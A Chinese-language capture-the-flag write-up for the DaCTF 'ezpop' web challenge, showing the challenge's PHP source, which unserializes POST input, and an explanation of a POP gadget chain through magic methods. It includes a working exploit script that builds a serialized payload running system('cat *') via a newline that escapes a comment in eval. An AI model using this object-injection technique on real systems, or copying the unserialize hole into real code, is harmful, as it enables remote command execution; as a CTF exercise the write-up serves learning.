dactf web ezpop
阿新 • • 發佈:2022-03-27
復現一道dactf的ezpop
<?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; public function __destruct() { echo $this->f1 . '114514'; } public function run() { ($this->f1)(); } public function __call($a, $b) { echo $this->f1->get_flag(); } } class what { public $a; public function __toString() { $this->a->run(); return 'hello'; } } class mix { public $m1; public function run() { ($this->m1)(); } public function get_flag() { eval('#' . $this->m1); } } if (isset($_POST['cmd'])) { unserialize($_POST['cmd']); } else { highlight_file(__FILE__); }
是一道pop鏈的題目
我們先理清楚各個魔術函式之間的關係
destruct是起點,然後因為將f1當作字串拼接所以觸發to_string f1是what類物件例項。然後f1裡面觸發a的run()函式然後應該可以走兩條路,我們選擇mix類,所以a是mix類例項。然後將m1以函式方式呼叫很顯然觸發invoke函式,所以m1是crow類例項。然後呼叫v1不存在的函式,觸發call函式,然後就會執行get_flag函式。但是eval()函式裡有註釋符所以我們用\n來跳過註釋符。下面是我的exp。
<?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; public function __destruct() { echo $this->f1 . '114514'; } public function run() { ($this->f1)(); } public function __call($a, $b) { echo $this->f1->get_flag(); } } class what { public $a; public function __toString() { $this->a->run(); return 'hello'; } } class mix { public $m1; public function run() { ($this->m1)(); } public function get_flag() { eval('#' . $this->m1); } } $fin=new fin(); $fin1=new fin(); $what=new what(); $mix= new mix(); $mix1=new mix(); $crow=new crow(); $fin->f1=$what; $what->a=$mix; $mix->m1=$crow; $crow->v1=$fin1; $fin1->f1=$mix1; $mix1->m1="\nsystem('cat *');"; echo urlencode((serialize($fin))); ?>
開啟所有檔案以後
在原始碼中找到flag
(ri)唄hackbar坑慘了 裡面的posturl編碼自動給我加了個換行符導致死也沒做出來,所以還是用bp吧。